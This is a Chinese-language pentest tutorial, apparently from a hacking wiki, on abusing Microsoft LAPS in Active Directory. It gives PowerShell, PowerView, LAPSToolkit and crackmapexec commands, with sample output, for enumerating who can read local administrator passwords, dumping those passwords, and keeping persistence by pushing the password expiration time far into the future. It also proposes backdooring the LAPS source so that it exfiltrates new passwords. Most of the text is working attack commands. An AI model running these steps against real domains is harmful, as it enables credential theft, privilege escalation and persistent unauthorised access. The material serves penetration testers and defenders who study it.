regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView 也可以用来查找谁可以读取密码并读取它:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
LAPSToolkit
LAPSToolkit 简化了对启用了 LAPS 的所有计算机进行枚举的过程。
其中一个功能是解析**ExtendedRights以查找启用了 LAPS 的所有计算机**。这将显示专门委派为读取 LAPS 密码的组,通常是受保护组中的用户。
一个加入计算机到域的帐户会在该主机上获得All Extended Rights,这个权限赋予了该帐户读取密码的能力。枚举可能会显示一个可以在主机上读取 LAPS 密码的用户帐户。这可以帮助我们针对特定的 AD 用户,他们可以读取 LAPS 密码。
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
使用Crackmapexec转储LAPS密码
如果没有访问powershell的权限,您可以通过LDAP远程滥用此特权。
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
如果管理员使用**Reset-AdmPwdPassword命令; 或者在 LAPS GPO 中启用了不允许密码过期时间超过策略要求**,密码仍然会被重置。
后门
LAPS 的原始源代码可以在这里找到,因此可以在代码中放置一个后门(例如在 Main/AdmPwd.PS/Main.cs 中的 Get-AdmPwdPassword 方法内),以某种方式外泄新密码或将其存储在某处。